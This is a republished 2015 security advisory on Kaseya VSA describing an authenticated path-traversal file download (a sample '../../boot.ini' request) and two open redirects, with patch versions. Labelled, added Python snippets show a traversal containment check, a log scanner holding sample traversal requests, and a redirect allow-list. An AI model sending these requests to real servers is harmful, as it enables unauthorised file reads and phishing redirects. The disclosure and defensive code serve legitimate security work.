Kaseya Virtual System Administrator File Download / Open Redirect Vulnerabilities
2015-07-14T00:00:00
ID 1337DAY-ID-23882 Type zdt Reporter Pedro Ribeiro Modified 2015-07-14T00:00:00
Description
Kaseya Virtual System Administrator suffers from arbitrary file download and open redirection vulnerabilities.
Two vulns in Kaseya Virtual System Administrator - an authenticated
arbitrary file download and two lame open redirects.
Full advisory text below and at [1]. Thanks to CERT for helping me to
disclose these vulnerabilities [2].
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 13/07/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can
be leveraged seamlessly across IT disciplines to streamline and
automate your IT services. Kaseya VSA integrates key management
capabilities into a single platform. Kaseya VSA makes your IT staff
more productive, your services more reliable, your systems more
secure, and your value easier to show."
>> Technical details:
#1
Vulnerability: Arbitrary file download (authenticated)
Affected versions: unknown, at least v9
GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/
A valid login is needed, and the Referer header must be included. A
sample request can be obtained by downloading any file attached to any
ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in
the default C:\Kaseya directory. The file download root is the
WebPages directory (<Kaseya_Install_Dir>\WebPages\).
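Added example, not code from the advisory or from Kaseya: a containment check of the kind that closes a filepath traversal like the one above, plus a scan of constructed IIS-style log lines for Downloader.ashx requests whose filepath escapes the WebPages root. The root path and the trimmed log layout are assumptions; Python is used for illustration rather than the product's ASP.NET.

```python
"""Containment check and log triage for a Downloader.ashx-style 'filepath'
parameter. Illustrative Python added here, not Kaseya's code; it assumes the
download root is <Kaseya_Install_Dir>\\WebPages on a default C:\\Kaseya install."""
import posixpath
from urllib.parse import parse_qs, unquote

ROOT = "C:\\Kaseya\\WebPages"


def is_contained(root, requested):
    """True only if `requested` names a file strictly inside `root`.
    Decodes once, treats '\\' like '/' and collapses '..' before the prefix
    comparison, so '../../boot.ini', '..\\..\\boot.ini' and '%2e%2e/boot.ini'
    are rejected; rooted paths and drive letters are refused outright."""
    req = unquote(requested).replace("\\", "/")
    if not req or req.startswith("/") or ":" in req:
        return False
    norm_root = posixpath.normpath(root.replace("\\", "/")).rstrip("/")
    joined = posixpath.normpath(norm_root + "/" + req)
    return joined.startswith(norm_root + "/")


def flag_download_requests(log_lines):
    """Return (client_ip, filepath) for Downloader.ashx requests whose filepath
    escapes the root. Lines use a constructed, trimmed IIS W3C layout:
    date time cs-method cs-uri-stem cs-uri-query c-ip sc-status."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue
        uri_stem, query, client_ip = parts[3], parts[4], parts[5]
        if not uri_stem.lower().endswith("/core/downloader.ashx"):
            continue
        for fp in parse_qs(query, keep_blank_values=True).get("filepath", []):
            if not is_contained(ROOT, fp):
                hits.append((client_ip, fp))
    return hits


# Constructed sample log: a legitimate ticket attachment download, two
# traversal attempts (plain and with %5C-encoded backslashes), one unrelated hit.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2015-07-13 10:01:02 GET /vsaPres/web20/core/Downloader.ashx displayName=report.pdf&filepath=ticketfiles/1234/report.pdf 10.0.0.7 200",
    "2015-07-13 10:01:09 GET /vsaPres/web20/core/Downloader.ashx displayName=whatever&filepath=../../boot.ini 10.0.0.9 200",
    "2015-07-13 10:01:15 GET /vsaPres/web20/core/Downloader.ashx displayName=x&filepath=..%5C..%5Cboot.ini 10.0.0.9 200",
    "2015-07-13 10:02:00 GET /vsaPres/Web20/core/LocalProxy.ashx url=http://www.google.com 10.0.0.9 302",
]
```

Requests that pass `is_contained` but still return a 200 for a path outside the intended attachment folders are worth a second look, since the root here is the whole WebPages tree.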
#2
Vulnerability: Open redirect (unauthenticated)
Affected versions: unknown, at least v7 to XXX
a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(the Host header has to be spoofed to the target)
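Added example, again not from the advisory or the product: an allow-list check for a redirect or proxy target parameter such as urlToLoad or url. It compares the target against a configured canonical host (the constructed placeholder vsa.example.internal) instead of the request's Host header, which case b) above shows an attacker can set.

```python
"""Allow-list check for redirect/proxy targets such as supportLoad.asp's
urlToLoad or LocalProxy.ashx's url parameter. Illustrative Python added here,
not Kaseya's code. The canonical host is server-side configuration; it is
never read from the request's Host header, which the advisory shows is
attacker-controlled for LocalProxy.ashx."""
from urllib.parse import quote, unquote, urlsplit, urlunsplit

CANONICAL_HOST = "vsa.example.internal"  # constructed placeholder


def safe_redirect_target(value, canonical_host=CANONICAL_HOST):
    """Return a same-site path to redirect to, or None if the value must be
    refused. Only a site-relative path, or an absolute http(s) URL whose host
    is the configured canonical host, is accepted."""
    if not value:
        return None
    # Decode once and treat backslashes like slashes, as browsers do, so
    # '/\\www.google.com' and '%2F%2Fwww.google.com' are seen as '//host'.
    raw = unquote(value).strip().replace("\\", "/")
    if raw.startswith("//"):
        return None  # scheme-relative: the browser would go to that host
    parts = urlsplit(raw)
    if parts.scheme or parts.netloc:
        # Absolute URL: allow only http(s) to the canonical host. hostname
        # strips any user@ prefix, so 'http://good@www.google.com' is refused.
        if parts.scheme not in ("http", "https"):
            return None  # e.g. javascript: or data:
        if parts.hostname != canonical_host.lower():
            return None
        path = parts.path or "/"
    else:
        path = parts.path
        if not path.startswith("/"):
            return None  # 'www.google.com/x' would resolve against the current page
    return urlunsplit(("", "", quote(path, safe="/"), parts.query, parts.fragment))
```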
>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29
# 0day.today [2018-01-04] #